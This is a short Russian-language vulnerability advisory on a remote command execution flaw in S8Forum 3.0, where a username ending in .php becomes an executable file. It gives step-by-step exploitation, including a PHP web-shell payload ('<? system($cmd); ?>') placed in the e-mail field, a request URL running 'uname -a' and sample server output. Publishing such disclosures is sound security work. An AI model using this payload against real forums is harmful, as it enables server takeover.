S8Forum уязвим к удаленному выполнению произвольных команд. 

Когда пользователь регистрируется на форуме, локально создается файл с указанным именем пользователя с данными пользователя. В результате, злонамеренный пользователь может создать файл со злонамеренным именем и PHP (.php) расширением, который будет содержать злонамеренный PHP код. Этот файл может быть вызван через HTTP. Пример: 

— go to Register
— insert in Username:
any_name.php 
NOTE: .php 🙂
— in password : any_pasword.
— in E-Mail:
<? system($cmd); ?>
or any code 🙁
— now go to this URL:
http://sitename/s8forumfolder/users/any_name.php?cmd=uname%20-a

evil.php:c4ca4238a0b923820dcc509a6f75849b Linux
xxx.xxx.net 2.4.18 #2 SMP Mon Nov 18 16:50:02 CST 2002
i686 unknown 

Уязвимость обнаружена в Kelli Shaver S8Forum 3.0.



Оставить мнение